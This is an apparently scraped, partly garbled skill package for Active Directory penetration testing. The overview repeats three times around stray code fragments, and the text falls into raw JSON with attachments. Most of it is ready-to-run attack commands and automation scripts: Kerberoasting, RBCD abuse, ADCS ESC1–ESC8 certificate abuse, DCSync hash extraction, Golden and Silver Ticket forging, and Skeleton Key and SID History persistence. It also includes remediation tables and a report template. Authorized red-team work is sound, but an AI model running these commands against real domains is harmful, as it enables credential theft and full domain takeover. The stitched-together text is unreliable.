Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

\\\n -computer-pass 'EvilPass123' -dc-ip 10.0.0.5\npython3 rbcd.py -delegate-to 'TARGET

Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

-delegate-from 'EVIL

Performing Active Directory Penetration Test Overview Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin. When to Use - When conducting security assessments that involve performing active directory penetration test - When following incident response procedures for rel…

\\\n -dc-ip 10.0.0.5 'corp.local/testuser:Password123'\nimpacket-getST 'corp.local/EVIL$:EvilPass123' -spn 'CIFS/target.corp.local' \\\n -impersonate administrator -dc-ip 10.0.0.5\n```\n\n## Phase 3 — ADCS (Active Directory Certificate Services) Attacks\n\n```bash\n# Enumerate ADCS with Certipy\ncertipy find -u '[email protected]' -p 'Password123' -dc-ip 10.0.0.5 \\\n -vulnerable -stdout\n\n# ESC1 — Vulnerable certificate template (enrollee can specify SAN)\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template VulnerableWebServer -upn [email protected]\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.0.0.5\n\n# ESC4 — Template ACL misconfiguration\n# Modify template to enable ESC1 conditions, then exploit as above\n\n# ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA\ncertipy req -u '[email protected]' -p 'Password123' \\\n -target ca.corp.local -ca CORP-CA \\\n -template User -upn [email protected]\n\n# ESC8 — NTLM relay to HTTP enrollment endpoint\ncertipy relay -target 'http://ca.corp.local/certsrv/certfnsh.asp' \\\n -template DomainController\n```\n\n## Phase 4 — Domain Privilege Escalation\n\n### DCSync Attack\n\n```bash\n# DCSync — extract all domain hashes (requires replication rights)\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' -just-dc\n\n# DCSync specific user\nimpacket-secretsdump 'corp.local/domainadmin:[email protected]' \\\n -just-dc-user krbtgt\n\n# With Mimikatz (Windows)\nmimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt\n```\n\n### Golden Ticket\n\n```bash\n# Create Golden Ticket (requires krbtgt hash and domain SID)\nimpacket-ticketer -nthash \u003ckrbtgt_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local administrator\nexport KRB5CCNAME=administrator.ccache\nimpacket-psexec 'corp.local/[email protected]' -k -no-pass\n\n# With Mimikatz\nmimikatz# kerberos::golden /user:administrator /domain:corp.local \\\n /sid:S-1-5-21-... /krbtgt:\u003chash> /ptt\n```\n\n### Silver Ticket\n\n```bash\n# Create Silver Ticket for specific service\nimpacket-ticketer -nthash \u003cservice_nthash> -domain-sid S-1-5-21-... \\\n -domain corp.local -spn MSSQL/sqlserver.corp.local administrator\n\nexport KRB5CCNAME=administrator.ccache\nimpacket-mssqlclient 'corp.local/[email protected]' -k -no-pass\n```\n\n## Phase 5 — Persistence Demonstration\n\n```bash\n# Skeleton Key (inject into LSASS — authorized testing only)\nmimikatz# privilege::debug\nmimikatz# misc::skeleton\n# Now any user can authenticate with \"mimikatz\" as password\n\n# AdminSDHolder persistence\n# Add controlled user to AdminSDHolder ACL\n# SDProp process propagates ACL to all protected groups every 60 minutes\n\n# SID History injection\n# Inject Domain Admin SID into low-privilege user's SID history\n\n# Document all persistence mechanisms and clean up after testing\n```\n\n## Findings and Remediation\n\n| Finding | CVSS | Remediation |\n|---------|------|-------------|\n| Kerberoastable accounts with weak passwords | 7.5 | Use gMSA, enforce 25+ char passwords for service accounts |\n| Unconstrained delegation on servers | 8.1 | Remove unconstrained delegation, use constrained or RBCD |\n| Vulnerable ADCS templates (ESC1-ESC8) | 9.8 | Audit templates, remove dangerous permissions, require approval |\n| DCSync permissions on non-DA accounts | 9.8 | Audit replication rights, implement tiered admin model |\n| LLMNR/NBT-NS enabled | 8.1 | Disable via GPO |\n| No LAPS deployed | 7.2 | Deploy Windows LAPS for local admin management |\n| Weak domain password policy | 6.5 | Enforce 14+ chars, implement fine-grained password policies |\n\n## References\n\n- BloodHound: https://github.com/BloodHoundAD/BloodHound\n- Impacket: https://github.com/fortra/impacket\n- Certipy: https://github.com/ly4k/Certipy\n- HackTricks AD: https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html\n- SpecterOps AD Security: https://specterops.io/blog/\n- MITRE ATT&CK: https://attack.mitre.org/\n---","attachment_filenames":["assets/template.md","references/api-reference.md","references/standards.md","references/workflows.md","scripts/agent.py","scripts/process.py"],"attachments":[{"filename":"assets/template.md","content":"# Active Directory Penetration Test — Report Template\n\n## Document Control\n| Field | Value |\n|-------|-------|\n| Domain | [corp.local] |\n| Test Type | Active Directory Security Assessment |\n| Starting Access | Standard Domain User |\n| Period | [Start] — [End] |\n\n## Executive Summary\n[Summary of AD security posture, key attack paths discovered, and domain compromise status]\n\n## Attack Path Diagram\n```\ntestuser (Domain User)\n → Kerberoasting svc_sql (T1558.003)\n → Cracked password: \"SqlServer2024!\"\n → Local admin on SQL01 (T1078)\n → Mimikatz LSASS dump (T1003.001)\n → DA credentials: da_admin\n → DCSync all hashes (T1003.006)\n → FULL DOMAIN COMPROMISE\n```\n\n## Findings\n\n### Finding [N]: [Title]\n| Attribute | Detail |\n|-----------|--------|\n| Severity | [Critical/High/Medium/Low] |\n| MITRE ATT&CK | [Technique] |\n| Affected | [Accounts/Systems] |\n| Remediation | [Fix] |\n\n## Remediation Priority\n| # | Action | Timeline |\n|---|--------|----------|\n| 1 | Deploy gMSA for service accounts | 2 weeks |\n| 2 | Fix ADCS vulnerable templates | 1 week |\n| 3 | Implement tiered admin model | 30 days |\n| 4 | Enable LAPS | 30 days |\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1195,"content_sha256":"8b93883692ca2fa529d3ca3c6b175e36c324c984dc4471e91df38c6547ee15a0"},{"filename":"references/api-reference.md","content":"# Active Directory Penetration Test - API Reference\n\n## ldap3 Library\n\n### Connection\n```python\nfrom ldap3 import Server, Connection, ALL, SUBTREE\nserver = Server(\"ldaps://dc.example.com\", get_info=ALL, use_ssl=True)\nconn = Connection(server, user=\"DOMAIN\\\\user\", password=\"pass\", auto_bind=True)\n```\n\n### Key LDAP Queries\n\n| Purpose | Filter |\n|---------|--------|\n| All users | `(&(objectClass=user)(objectCategory=person))` |\n| Users with SPNs | `(&(objectClass=user)(servicePrincipalName=*))` |\n| AS-REP Roastable | `(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))` |\n| Domain admins | `(&(objectClass=group)(cn=Domain Admins))` |\n| Password policy | `(objectClass=domain)` |\n\n### UserAccountControl Flags\n\n| Flag | Hex | Test |\n|------|-----|------|\n| ACCOUNTDISABLE | 0x0002 | Account disabled |\n| PASSWD_NOTREQD | 0x0020 | No password required |\n| DONT_EXPIRE_PASSWORD | 0x10000 | Password never expires |\n| DONT_REQ_PREAUTH | 0x400000 | No Kerberos pre-auth |\n\n## Impacket Tools\n\n### GetUserSPNs (Kerberoasting)\n```bash\npython3 -m impacket.examples.GetUserSPNs DOMAIN/user:pass -dc-ip 10.0.0.1 -request\n```\n\n### GetNPUsers (AS-REP Roasting)\n```bash\npython3 -m impacket.examples.GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip 10.0.0.1\n```\n\n### secretsdump (Credential Extraction)\n```bash\npython3 -m impacket.examples.secretsdump DOMAIN/admin:[email protected]\n```\n\n## Attack Techniques\n\n### Kerberoasting\n1. Enumerate users with SPNs via LDAP\n2. Request TGS tickets for those SPNs\n3. Extract ticket hashes\n4. Crack offline with hashcat (mode 13100)\n\n### AS-REP Roasting\n1. Find accounts with pre-auth disabled\n2. Request AS-REP without authentication\n3. Extract encrypted part of AS-REP\n4. Crack offline with hashcat (mode 18200)\n\n### Password Policy Weaknesses\n- Min length \u003c 12 characters\n- No account lockout threshold\n- No password history enforcement\n- Password never expires on service accounts\n\n## Output Schema\n\n```json\n{\n \"report\": \"ad_penetration_test\",\n \"domain_info\": {\"default_naming_context\": \"DC=example,DC=com\"},\n \"total_users\": 500,\n \"total_findings\": 12,\n \"severity_summary\": {\"critical\": 1, \"high\": 8, \"medium\": 3}\n}\n```\n\n## CLI Usage\n\n```bash\npython agent.py --server ldaps://dc.example.com --username \"DOMAIN\\\\user\" --password \"pass\" --output report.json\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":2314,"content_sha256":"6a7461913dd1dab7527085cf527f9d54ed1ece0094c88abd804e25396c9fbae8"},{"filename":"references/standards.md","content":"# Standards — Active Directory Penetration Testing\n\n## Key Frameworks\n- MITRE ATT&CK for Enterprise: https://attack.mitre.org/matrices/enterprise/\n- ANSSI AD Security Guide: https://www.cert.ssi.gouv.fr/uploads/guide-ad.html\n- Microsoft Tiered Administration Model: https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model\n\n## MITRE ATT&CK Techniques for AD Testing\n\n| Technique | ID | Description |\n|-----------|----|-------------|\n| Kerberoasting | T1558.003 | Steal Kerberos TGS tickets for offline cracking |\n| AS-REP Roasting | T1558.004 | Target accounts without pre-auth |\n| DCSync | T1003.006 | Replicate domain credentials via DRSUAPI |\n| Golden Ticket | T1558.001 | Forge TGT using krbtgt hash |\n| Pass-the-Hash | T1550.002 | Authenticate using NTLM hash |\n| Unconstrained Delegation | T1558 | Abuse delegation to steal TGTs |\n| ADCS Abuse | T1649 | Exploit misconfigured certificate templates |\n\n## AD Security Benchmarks\n- CIS Microsoft Windows Server Benchmark\n- STIG (Security Technical Implementation Guide) for Windows\n- Microsoft Security Compliance Toolkit\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1125,"content_sha256":"524522d0429f13e2365f1c528a14abe420c632a3b2b040be2d3cd067af11666e"},{"filename":"references/workflows.md","content":"# Workflows — Active Directory Penetration Testing\n\n## AD Attack Flow\n\n```\nDomain User Credentials\n │\n ├── Enumeration\n │ ├── BloodHound (attack paths)\n │ ├── LDAP queries (users, groups, GPOs)\n │ └── Service account discovery (SPNs)\n │\n ├── Kerberos Attacks\n │ ├── Kerberoasting → Hash cracking\n │ ├── AS-REP Roasting → Hash cracking\n │ └── Delegation abuse (unconstrained/constrained/RBCD)\n │\n ├── ADCS Attacks\n │ ├── ESC1-ESC8 template exploitation\n │ └── Certificate-based auth to DA\n │\n ├── Credential Harvesting\n │ ├── LSASS dump (Mimikatz)\n │ ├── SAM/SYSTEM extraction\n │ └── DPAPI credential decryption\n │\n ├── Domain Escalation\n │ ├── DCSync (krbtgt + all hashes)\n │ ├── Golden Ticket\n │ └── AdminSDHolder persistence\n │\n └── Impact Demonstration\n ├── Full domain hash extraction\n ├── Access to sensitive resources\n └── Cross-forest trust abuse\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":1169,"content_sha256":"d0673170c78afcb6d6c1639581c2e393562061c69a23027b0253f1a5fc6dcb55"},{"filename":"scripts/agent.py","content":"#!/usr/bin/env python3\n\"\"\"Active Directory Penetration Test agent - automates AD enumeration using\nldap3 for LDAP queries, subprocess for impacket tools, and generates a\nstructured pentest findings report.\"\"\"\n\nimport argparse\nimport json\nimport subprocess\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\ntry:\n from ldap3 import Server, Connection, ALL, SUBTREE\nexcept ImportError:\n print(\"Install ldap3: pip install ldap3\", file=sys.stderr)\n sys.exit(1)\n\n\ndef connect_ldap(server_url: str, username: str, password: str, use_ssl: bool = True) -> Connection:\n \"\"\"Establish authenticated LDAP connection.\"\"\"\n srv = Server(server_url, get_info=ALL, use_ssl=use_ssl)\n conn = Connection(srv, user=username, password=password, auto_bind=True)\n return conn\n\n\ndef get_domain_info(conn: Connection) -> dict:\n \"\"\"Extract domain functional level and naming context.\"\"\"\n info = conn.server.info\n return {\n \"default_naming_context\": info.other.get(\"defaultNamingContext\", [\"\"])[0],\n \"forest_functionality\": info.other.get(\"forestFunctionality\", [\"\"])[0],\n \"domain_functionality\": info.other.get(\"domainFunctionality\", [\"\"])[0],\n }\n\n\ndef enumerate_users(conn: Connection, base_dn: str) -> list[dict]:\n \"\"\"Enumerate all domain users with security-relevant attributes.\"\"\"\n conn.search(base_dn, \"(&(objectClass=user)(objectCategory=person))\",\n search_scope=SUBTREE,\n attributes=[\"sAMAccountName\", \"userAccountControl\", \"adminCount\",\n \"pwdLastSet\", \"lastLogon\", \"servicePrincipalName\",\n \"memberOf\", \"description\"])\n users = []\n for entry in conn.entries:\n uac = int(str(entry.userAccountControl)) if hasattr(entry, \"userAccountControl\") else 0\n users.append({\n \"username\": str(entry.sAMAccountName),\n \"admin_count\": str(entry.adminCount) if hasattr(entry, \"adminCount\") else \"0\",\n \"password_not_required\": bool(uac & 0x0020),\n \"password_never_expires\": bool(uac & 0x10000),\n \"account_disabled\": bool(uac & 0x0002),\n \"kerberos_preauth_not_required\": bool(uac & 0x400000),\n \"has_spn\": bool(entry.servicePrincipalName),\n \"description\": str(entry.description) if hasattr(entry, \"description\") else \"\",\n })\n return users\n\n\ndef find_asrep_roastable(users: list[dict]) -> list[dict]:\n \"\"\"Identify accounts vulnerable to AS-REP Roasting.\"\"\"\n findings = []\n for user in users:\n if user[\"kerberos_preauth_not_required\"] and not user[\"account_disabled\"]:\n findings.append({\n \"type\": \"asrep_roastable\",\n \"severity\": \"high\",\n \"account\": user[\"username\"],\n \"detail\": \"Kerberos pre-authentication disabled - AS-REP Roasting possible\",\n })\n return findings\n\n\ndef find_kerberoastable(users: list[dict]) -> list[dict]:\n \"\"\"Identify accounts vulnerable to Kerberoasting.\"\"\"\n findings = []\n for user in users:\n if user[\"has_spn\"] and not user[\"account_disabled\"]:\n findings.append({\n \"type\": \"kerberoastable\",\n \"severity\": \"high\",\n \"account\": user[\"username\"],\n \"detail\": \"User account with SPN set - Kerberoasting possible\",\n })\n return findings\n\n\ndef check_password_policy(conn: Connection, base_dn: str) -> list[dict]:\n \"\"\"Audit domain password policy.\"\"\"\n conn.search(base_dn, \"(objectClass=domain)\", search_scope=SUBTREE,\n attributes=[\"minPwdLength\", \"lockoutThreshold\", \"pwdHistoryLength\",\n \"maxPwdAge\", \"minPwdAge\", \"lockoutDuration\"])\n findings = []\n if conn.entries:\n entry = conn.entries[0]\n min_len = int(str(entry.minPwdLength)) if hasattr(entry, \"minPwdLength\") else 0\n lockout = int(str(entry.lockoutThreshold)) if hasattr(entry, \"lockoutThreshold\") else 0\n if min_len \u003c 12:\n findings.append({\n \"type\": \"weak_password_policy\",\n \"severity\": \"high\",\n \"detail\": f\"Minimum password length is {min_len} (recommended: 12+)\",\n })\n if lockout == 0:\n findings.append({\n \"type\": \"no_account_lockout\",\n \"severity\": \"critical\",\n \"detail\": \"No account lockout policy - brute force attacks possible\",\n })\n return findings\n\n\ndef run_impacket_getspns(dc_ip: str, domain: str, username: str, password: str) -> dict:\n \"\"\"Run impacket GetUserSPNs for Kerberoasting.\"\"\"\n cmd = [\"python3\", \"-m\", \"impacket.examples.GetUserSPNs\",\n f\"{domain}/{username}:{password}\", \"-dc-ip\", dc_ip, \"-request\"]\n try:\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)\n return {\"success\": True, \"output\": result.stdout[:5000], \"errors\": result.stderr[:1000]}\n except (subprocess.TimeoutExpired, FileNotFoundError) as e:\n return {\"success\": False, \"error\": str(e)}\n\n\ndef generate_report(server_url: str, username: str, password: str,\n use_ssl: bool, dc_ip: str = None) -> dict:\n \"\"\"Run full AD pentest enumeration and build report.\"\"\"\n conn = connect_ldap(server_url, username, password, use_ssl)\n domain_info = get_domain_info(conn)\n base_dn = domain_info[\"default_naming_context\"]\n\n users = enumerate_users(conn, base_dn)\n findings = []\n findings.extend(find_asrep_roastable(users))\n findings.extend(find_kerberoastable(users))\n findings.extend(check_password_policy(conn, base_dn))\n\n conn.unbind()\n\n from collections import Counter\n severity_counts = Counter(f[\"severity\"] for f in findings)\n return {\n \"report\": \"ad_penetration_test\",\n \"generated_at\": datetime.utcnow().isoformat() + \"Z\",\n \"domain_info\": domain_info,\n \"total_users\": len(users),\n \"total_findings\": len(findings),\n \"severity_summary\": dict(severity_counts),\n \"findings\": findings,\n }\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"AD Penetration Test Agent\")\n parser.add_argument(\"--server\", required=True, help=\"LDAP server URL (ldaps://dc.example.com)\")\n parser.add_argument(\"--username\", required=True, help=\"Domain username (DOMAIN\\\\\\\\user)\")\n parser.add_argument(\"--password\", required=True, help=\"Password\")\n parser.add_argument(\"--no-ssl\", action=\"store_true\", help=\"Disable SSL\")\n parser.add_argument(\"--dc-ip\", help=\"DC IP for impacket tools\")\n parser.add_argument(\"--output\", help=\"Output JSON file path\")\n args = parser.parse_args()\n\n report = generate_report(args.server, args.username, args.password,\n not args.no_ssl, args.dc_ip)\n output = json.dumps(report, indent=2)\n if args.output:\n Path(args.output).write_text(output, encoding=\"utf-8\")\n print(f\"Report written to {args.output}\")\n else:\n print(output)\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":7053,"content_sha256":"4700864467979a016686de234dd11fc993c39055f29abff7477bafd38063eb82"},{"filename":"scripts/process.py","content":"#!/usr/bin/env python3\n\"\"\"\nActive Directory Penetration Test — Automation Process\n\nAutomates AD enumeration, Kerberos attack setup, and reporting.\nRequires: impacket, bloodhound-python, netexec, ldap3.\n\nUsage:\n python process.py --domain corp.local --dc-ip 10.0.0.5 -u testuser -p Password123 --output ./results\n\"\"\"\n\nimport subprocess\nimport json\nimport os\nimport argparse\nimport datetime\nfrom pathlib import Path\n\n\ndef run_command(cmd: list[str], timeout: int = 300) -> tuple[str, str, int]:\n try:\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)\n return result.stdout, result.stderr, result.returncode\n except subprocess.TimeoutExpired:\n return \"\", f\"Timed out after {timeout}s\", -1\n except FileNotFoundError:\n return \"\", f\"Not found: {cmd[0]}\", -1\n\n\ndef enumerate_domain_users(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> list[str]:\n \"\"\"Enumerate domain users via LDAP.\"\"\"\n print(\"[*] Enumerating domain users...\")\n stdout, stderr, rc = run_command(\n [\"netexec\", \"smb\", dc_ip, \"-u\", user, \"-p\", password, \"-d\", domain, \"--users\"]\n )\n users_file = output_dir / \"domain_users.txt\"\n users = []\n for line in stdout.splitlines():\n if \"\\\\\\\\\"-1 not in line and domain.split(\".\")[0].upper() in line.upper():\n parts = line.strip().split()\n for part in parts:\n if \"\\\\\" in part:\n username = part.split(\"\\\\\")[-1]\n users.append(username)\n with open(users_file, \"w\") as f:\n f.write(\"\\n\".join(users))\n print(f\"[+] Found {len(users)} domain users\")\n return users\n\n\ndef get_spn_users(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> str:\n \"\"\"Find Kerberoastable accounts.\"\"\"\n print(\"[*] Finding Kerberoastable service accounts...\")\n output_file = output_dir / \"kerberoast_hashes.txt\"\n stdout, stderr, rc = run_command(\n [\"impacket-GetUserSPNs\", f\"{domain}/{user}:{password}\",\n \"-dc-ip\", dc_ip, \"-outputfile\", str(output_file), \"-request\"]\n )\n if rc == 0:\n print(f\"[+] Kerberoast hashes saved to {output_file}\")\n else:\n print(f\"[-] Kerberoasting: {stderr[:200]}\")\n return str(output_file)\n\n\ndef get_asrep_users(domain: str, dc_ip: str, users_file: str,\n output_dir: Path) -> str:\n \"\"\"Find AS-REP Roastable accounts.\"\"\"\n print(\"[*] Finding AS-REP Roastable accounts...\")\n output_file = output_dir / \"asrep_hashes.txt\"\n stdout, stderr, rc = run_command(\n [\"impacket-GetNPUsers\", f\"{domain}/\", \"-usersfile\", users_file,\n \"-dc-ip\", dc_ip, \"-outputfile\", str(output_file), \"-format\", \"hashcat\"]\n )\n if rc == 0:\n print(f\"[+] AS-REP hashes saved to {output_file}\")\n return str(output_file)\n\n\ndef collect_bloodhound(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> None:\n \"\"\"Run BloodHound data collection.\"\"\"\n print(\"[*] Collecting BloodHound data...\")\n stdout, stderr, rc = run_command(\n [\"bloodhound-python\", \"-u\", user, \"-p\", password,\n \"-d\", domain, \"-ns\", dc_ip, \"-c\", \"all\", \"--zip\"],\n timeout=600\n )\n if rc == 0:\n print(\"[+] BloodHound data collected\")\n else:\n print(f\"[-] BloodHound: {stderr[:200]}\")\n\n\ndef check_adcs(domain: str, dc_ip: str, user: str, password: str,\n output_dir: Path) -> str:\n \"\"\"Check for ADCS vulnerabilities.\"\"\"\n print(\"[*] Checking ADCS for vulnerable templates...\")\n output_file = output_dir / \"adcs_findings.txt\"\n stdout, stderr, rc = run_command(\n [\"certipy\", \"find\", \"-u\", f\"{user}@{domain}\", \"-p\", password,\n \"-dc-ip\", dc_ip, \"-vulnerable\", \"-stdout\"]\n )\n with open(output_file, \"w\") as f:\n f.write(stdout)\n if \"ESC\" in stdout:\n print(\"[+] Vulnerable ADCS templates found!\")\n else:\n print(\"[*] No vulnerable ADCS templates detected\")\n return str(output_file)\n\n\ndef generate_report(domain: str, output_dir: Path) -> str:\n \"\"\"Generate AD pentest report.\"\"\"\n print(\"[*] Generating report...\")\n report_file = output_dir / \"ad_pentest_report.md\"\n timestamp = datetime.datetime.now(datetime.timezone.utc).strftime(\"%Y-%m-%d %H:%M UTC\")\n\n kerberoast_count = 0\n kf = output_dir / \"kerberoast_hashes.txt\"\n if kf.exists():\n with open(kf) as f:\n kerberoast_count = sum(1 for line in f if line.strip() and line.startswith(\"$krb5tgs$\"))\n\n asrep_count = 0\n af = output_dir / \"asrep_hashes.txt\"\n if af.exists():\n with open(af) as f:\n asrep_count = sum(1 for line in f if line.strip() and line.startswith(\"$krb5asrep$\"))\n\n with open(report_file, \"w\") as f:\n f.write(f\"# Active Directory Penetration Test Report\\n\\n\")\n f.write(f\"**Domain:** {domain}\\n\")\n f.write(f\"**Generated:** {timestamp}\\n\\n---\\n\\n\")\n f.write(\"## Kerberos Attack Results\\n\\n\")\n f.write(f\"- Kerberoastable accounts: **{kerberoast_count}**\\n\")\n f.write(f\"- AS-REP Roastable accounts: **{asrep_count}**\\n\\n\")\n f.write(\"## Recommendations\\n\\n\")\n f.write(\"1. Convert service accounts to Group Managed Service Accounts (gMSA)\\n\")\n f.write(\"2. Enforce 25+ character passwords for remaining SPNs\\n\")\n f.write(\"3. Enable Kerberos pre-authentication for all accounts\\n\")\n f.write(\"4. Audit and remediate ADCS template vulnerabilities\\n\")\n f.write(\"5. Implement tiered administration model\\n\")\n f.write(\"6. Deploy monitoring for DCSync and Golden Ticket attacks\\n\")\n\n print(f\"[+] Report: {report_file}\")\n return str(report_file)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"AD Pentest Automation\")\n parser.add_argument(\"--domain\", required=True)\n parser.add_argument(\"--dc-ip\", required=True)\n parser.add_argument(\"-u\", \"--username\", required=True)\n parser.add_argument(\"-p\", \"--password\", required=True)\n parser.add_argument(\"--output\", default=\"./results\")\n args = parser.parse_args()\n\n output_dir = Path(args.output)\n output_dir.mkdir(parents=True, exist_ok=True)\n\n print(\"=\" * 60)\n print(f\" AD Penetration Test — {args.domain}\")\n print(\"=\" * 60)\n\n users = enumerate_domain_users(args.domain, args.dc_ip, args.username, args.password, output_dir)\n users_file = str(output_dir / \"domain_users.txt\")\n\n get_spn_users(args.domain, args.dc_ip, args.username, args.password, output_dir)\n get_asrep_users(args.domain, args.dc_ip, users_file, output_dir)\n collect_bloodhound(args.domain, args.dc_ip, args.username, args.password, output_dir)\n check_adcs(args.domain, args.dc_ip, args.username, args.password, output_dir)\n generate_report(args.domain, output_dir)\n\n print(\"\\n[+] AD pentest automation complete\")\n\n\nif __name__ == \"__main__\":\n main()\n","content_type":"text/x-python; charset=utf-8","language":"python","size":6938,"content_sha256":"8a29b6c102e08f7d94aa52e16340ec541edc2f99d795933b460e31a08f70dec0"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Performing Active Directory Penetration Test","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"When to Use","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When conducting security assessments that involve performing active directory penetration test","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When following incident response procedures for related security events","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When performing scheduled security testing or auditing activities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When validating security controls through hands-on testing","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Standard domain user credentials (minimum starting point)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network access to domain controllers (LDAP/389, Kerberos/88, SMB/445, DNS/53)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Tools: BloodHound, Impacket, Certipy, Rubeus, NetExec, Mimikatz","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Kali Linux or Windows attack machine with domain access","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 1 — AD Enumeration","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Domain Information Gathering","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Basic domain enumeration\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local --groups\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local --users\n\n# LDAP enumeration — domain controllers\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"OU=Domain Controllers,DC=corp,DC=local\" \"(objectClass=computer)\" dNSHostName\n\n# Enumerate trust relationships\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --trusts\n\n# Enumerate domain password policy\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --pass-pol\n\n# Enumerate Group Policy Objects\nnetexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --gpp-passwords\n\n# Find computers with unconstrained delegation\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"DC=corp,DC=local\" \"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))\" \\\n dNSHostName\n\n# Find users with constrained delegation\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"DC=corp,DC=local\" \"(&(objectCategory=user)(msds-allowedtodelegateto=*))\" \\\n sAMAccountName msds-allowedtodelegateto\n\n# Enumerate LAPS\nnetexec ldap 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local -M laps","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"BloodHound Attack Path Analysis","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Collect all BloodHound data\nbloodhound-python -u 'testuser' -p 'Password123' -d corp.local \\\n -ns 10.0.0.5 -c all --zip\n\n# Alternative: SharpHound from Windows\n.\\SharpHound.exe -c All --zipfilename bloodhound_data.zip\n\n# Start BloodHound\nsudo neo4j start\nbloodhound --no-sandbox\n\n# Key Cypher queries in BloodHound:\n# - Shortest path to Domain Admin\n# - Find Kerberoastable users\n# - Find AS-REP Roastable users\n# - Find users with DCSync rights\n# - Find shortest path from owned principals\n# - Find computers where Domain Users are local admin","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Service Account Discovery","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find service accounts with SPNs (Kerberoastable)\nimpacket-GetUserSPNs 'corp.local/testuser:Password123' -dc-ip 10.0.0.5\n\n# Find accounts without Kerberos pre-authentication\nimpacket-GetNPUsers 'corp.local/' -usersfile domain_users.txt \\\n -dc-ip 10.0.0.5 -format hashcat\n\n# Find managed service accounts\nldapsearch -x -H ldap://10.0.0.5 -D \"[email protected]\" -w \"Password123\" \\\n -b \"DC=corp,DC=local\" \"(objectClass=msDS-GroupManagedServiceAccount)\" \\\n sAMAccountName msDS-GroupMSAMembership","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Phase 2 — Kerberos Attacks","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Kerberoasting","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Extract TGS tickets for service accounts\nimpacket-GetUserSPNs 